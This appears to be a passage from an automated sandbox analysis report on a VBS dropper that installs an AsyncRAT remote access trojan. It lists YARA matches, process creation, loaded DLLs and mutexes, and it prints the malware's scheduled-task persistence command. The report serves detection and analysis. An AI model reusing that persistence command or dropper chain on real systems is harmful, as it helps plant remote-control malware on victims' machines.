            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeCode function: 7_2_00007FFAAC4D85D87_2_00007FFAAC4D85D8
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeCode function: 7_2_00007FFAAC4DD7DD7_2_00007FFAAC4DD7DD
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeCode function: 7_2_00007FFAAC4E51A17_2_00007FFAAC4E51A1
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeCode function: 7_2_00007FFAAC4D18CB7_2_00007FFAAC4D18CB
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeCode function: 7_2_00007FFAAC4CFE797_2_00007FFAAC4CFE79
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeCode function: 7_2_00007FFAAC4D19247_2_00007FFAAC4D1924
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeCode function: 7_2_00007FFAAC4D11A97_2_00007FFAAC4D11A9
            Source: C:\Users\user\AppData\Roaming\task.exeCode function: 16_2_00007FFAAC4C07C516_2_00007FFAAC4C07C5
            Source: SOA-injazfe-10424.vbsInitial sample: Strings found which are bigger than 50
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1204 -s 3304
            Source: 0000000C.00000002.1401173350.0000000002FC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000010.00000002.1554860101.000000000231E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0000000E.00000002.1470803241.000000000313A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0000000F.00000002.1517385326.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000014.00000002.2187461763.000000000324C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000007.00000002.2427816962.0000000002481000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: Process Memory Space: WindowsApp.exe PID: 1204, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: Process Memory Space: task.exe PID: 7172, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: Process Memory Space: task.exe PID: 7352, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: Process Memory Space: task.exe PID: 7480, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: Process Memory Space: task.exe PID: 7532, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: Process Memory Space: task.exe PID: 7912, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: WindowsApp.exe.2.drStatic PE information: Section: dCocB{ ZLIB complexity 1.0003641419491525
            Source: task.exe.7.drStatic PE information: Section: dCocB{ ZLIB complexity 1.0003641419491525
            Source: 12.2.task.exe.12fce598.5.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 12.2.task.exe.12fce598.5.raw.unpack, Helper.csCryptographic APIs: 'CreateDecryptor'
            Source: 12.2.task.exe.12fce598.5.raw.unpack, AlgorithmAES.csCryptographic APIs: 'CreateDecryptor'
            Source: 12.2.task.exe.12fce598.5.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
            Source: 12.2.task.exe.13f0000.2.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 12.2.task.exe.13f0000.2.raw.unpack, Helper.csCryptographic APIs: 'CreateDecryptor'
            Source: 12.2.task.exe.13f0000.2.raw.unpack, AlgorithmAES.csCryptographic APIs: 'CreateDecryptor'
            Source: 12.2.task.exe.13f0000.2.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
            Source: 12.2.task.exe.12f80918.3.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 12.2.task.exe.12f80918.3.raw.unpack, Helper.csCryptographic APIs: 'CreateDecryptor'
            Source: 12.2.task.exe.12f80918.3.raw.unpack, AlgorithmAES.csCryptographic APIs: 'CreateDecryptor'
            Source: 12.2.task.exe.12f80918.3.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
            Source: 16.2.task.exe.12317740.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 16.2.task.exe.12317740.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 16.2.task.exe.122c9ac0.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 16.2.task.exe.122c9ac0.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 12.2.task.exe.12fa7760.4.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 12.2.task.exe.12fa7760.4.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 12.2.task.exe.13f0000.2.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 12.2.task.exe.13f0000.2.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 12.2.task.exe.12fce598.5.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 12.2.task.exe.12fce598.5.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 16.2.task.exe.122f0908.2.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 16.2.task.exe.122f0908.2.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 12.2.task.exe.12f80918.3.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 12.2.task.exe.12f80918.3.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.spyw.evad.winVBS@12/9@6/3
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeFile created: C:\Users\user\AppData\Roaming\task.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeMutant created: NULL
            Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1204
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6912:120:WilError_03
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeMutant created: \Sessions\1\BaseNamedObjects\orLUmecz6hXR75b4
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user~1\AppData\Local\Temp\WindowsApp.exeJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA-injazfe-10424.vbs"
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA-injazfe-10424.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\WindowsApp.exe "C:\Users\user~1\AppData\Local\Temp\WindowsApp.exe"
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "task" /tr "C:\Users\user\AppData\Roaming\task.exe"
            Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\task.exe C:\Users\user\AppData\Roaming\task.exe
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\task.exe "C:\Users\user\AppData\Roaming\task.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\task.exe C:\Users\user\AppData\Roaming\task.exe
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\task.exe "C:\Users\user\AppData\Roaming\task.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\task.exe C:\Users\user\AppData\Roaming\task.exe
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1204 -s 3304
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\WindowsApp.exe "C:\Users\user~1\AppData\Local\Temp\WindowsApp.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "task" /tr "C:\Users\user\AppData\Roaming\task.exe"Jump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: linkinfo.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: ntshrui.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: cscapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: avicap32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: msvfw32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: task.lnk.7.drLNK file: ..\..\..\..\..\task.exe
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: Binary string: .pdb} source: WindowsApp.exe, 00000007.00000002.2433622723.000000001C948000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb_b9 source: WindowsApp.exe, 00000007.00000002.2432794842.000000001C142000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Windows.Forms.pdbH source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.Xml.ni.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb1&0 source: WindowsApp.exe, 00000007.00000002.2432794842.000000001C155000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: WindowsApp.exe, 00000007.00000002.2432794842.000000001C155000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\mscorlib.pdbra source: WindowsApp.exe, 00000007.00000002.2431833922.000000001B516000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.pdb@w^ source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.ni.pdbRSDS source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.Windows.Forms.ni.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: Microsoft.VisualBasic.pdbp source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.Drawing.ni.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.Configuration.ni.pdb source: WER2B9E.tmp.dmp.23.dr
